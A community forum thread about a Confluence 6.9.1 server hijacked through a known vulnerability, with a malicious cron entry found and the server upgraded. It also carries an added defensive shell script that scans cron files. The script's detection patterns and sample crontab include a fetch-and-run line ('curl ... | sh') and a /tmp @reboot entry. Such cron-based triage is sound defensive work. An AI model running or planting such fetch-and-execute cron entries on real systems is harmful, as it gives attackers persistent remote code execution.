zombie process of user "confluence" causes High CPU usage

VujacicSun April 19, 2019

First of all, the server I run Confluence on does not have enough disk space for the weekly backup job for the Confluence website, and I cannot access the Confluence website from my web browser.

Then, I run stop-confluence.sh, which reports that killing the process failed. I run 'kill -9 XXXX' on the confluence process I can see in the 'top' command output.

Then, I start the Confluence server by running 'start-confluence.sh' as root. But I still cannot access the Confluence website, and I found that the zombie process of user "confluence" causes high CPU usage:

[Screenshot: conf.jpg]

and I CAN NOT kill the process any more, even if I reboot the system.

I see the following in atlassian-confluence.log:

2019-04-19 13:30:29,421 WARN [synchrony-interop-executor:thread-2] [plugins.synchrony.bootstrap.DefaultSynchronyProxyMonitor] pollHealthcheck Could not ping the synchrony-proxy [http://127.0.0.1:8090/synchrony-proxy/healthcheck]: {}
-- url: /longrunningtaskxml.action | referer: http://****:8090/admin/restore-local-file.action | traceId: 5eb0806c7e6e9c96 | userName: *** | action: longrunningtaskxml

 

The Confluence Version I used is 6.9.1-x64

2 answers

2 accepted

0 votes
Answer accepted
Daniel Eads
Atlassian Team
April 22, 2019

Hey Vujacic, welcome to the Community.

As Bastian linked, it looks like your instance has been attacked due to a security vulnerability. I've written up some general first steps for detection (you've identified a malicious process) on this article. For your case, I would recommend looking at the crontab next (instructions in the article) to stop the process from re-launching itself.

We are happy to help on this question if you continue to have issues after going through the article. Please let us know!

Thanks,
Daniel | Atlassian Support

VujacicSun April 23, 2019

Thanks for your help. 

I see the virus in '/var/spool/cron/confluence' and I have upgraded Confluence already.

Thx!
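Added example, not part of the thread or of the linked Atlassian article: a read-only triage of per-user cron spool files such as the '/var/spool/cron/confluence' mentioned above, flagging entries that would re-launch a process. The three patterns, the function names and the sample crontab are assumptions made for illustration, not indicators taken from this incident.

```shell
#!/bin/sh
# Added example: read-only triage of cron entries used for persistence.
# The patterns below are assumed heuristics, not indicators from the thread.

# audit_crontab [LABEL]: read a crontab on stdin and print suspicious lines
# as "LABEL:line_no: reason: text". Nothing is modified.
audit_crontab() {
    awk -v src="${1:-stdin}" '
        /^[ \t]*#/ { next }    # skip comments
        /^[ \t]*$/ { next }    # skip blank lines
        /(curl|wget)[^|]*[|][ \t]*(ba|da)?sh/ { print src ":" NR ": fetch-and-exec: " $0; next }
        /base64[ \t]+(-d|--decode)/           { print src ":" NR ": inline-decode: " $0; next }
        /\/(tmp|var\/tmp|dev\/shm)\//         { print src ":" NR ": temp-path: " $0; next }
    '
}

# audit_spool [DIR]: run audit_crontab over every readable per-user crontab.
audit_spool() {
    dir=${1:-/var/spool/cron}
    for f in "$dir"/*; do
        if [ -f "$f" ] && [ -r "$f" ]; then
            audit_crontab "$f" < "$f"
        fi
    done
}

# Constructed sample crontab (hypothetical paths and host, not from the thread).
sample_crontab() {
    cat <<'EOF'
# constructed sample for user "confluence"
0 2 * * 0 /usr/local/bin/weekly-backup.sh
# */5 * * * * curl -s http://example.invalid/old.sh | sh
*/10 * * * * curl -fsSL http://example.invalid/i.sh | sh
@reboot /tmp/.cache/worker >/dev/null 2>&1
30 3 * * * /usr/bin/find /var/log/app -name '*.gz' -mtime +30 -delete
EOF
}

# Demo on the constructed sample; flags lines 4 and 5.
sample_crontab | audit_crontab
# On a host, as root: audit_spool /var/spool/cron
```

Flagged lines are leads for manual review; a legitimate job can match a pattern and a malicious one can avoid all three.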

0 votes
Answer accepted
Bastian Stehmann
Community Champion
April 20, 2019

Hi @VujacicSun ,

There is a vulnerability in Confluence that is being attacked a lot this month, and it seems that you have been hit by it.

Here is the advisory regarding this: https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-10-968660855.html

VujacicSun April 23, 2019

Thanks for your help. 

It's exactly the problem as you attached and I have upgraded Confluence from 6.9.1 to 6.12.4. It seems back to normal.

Thx!
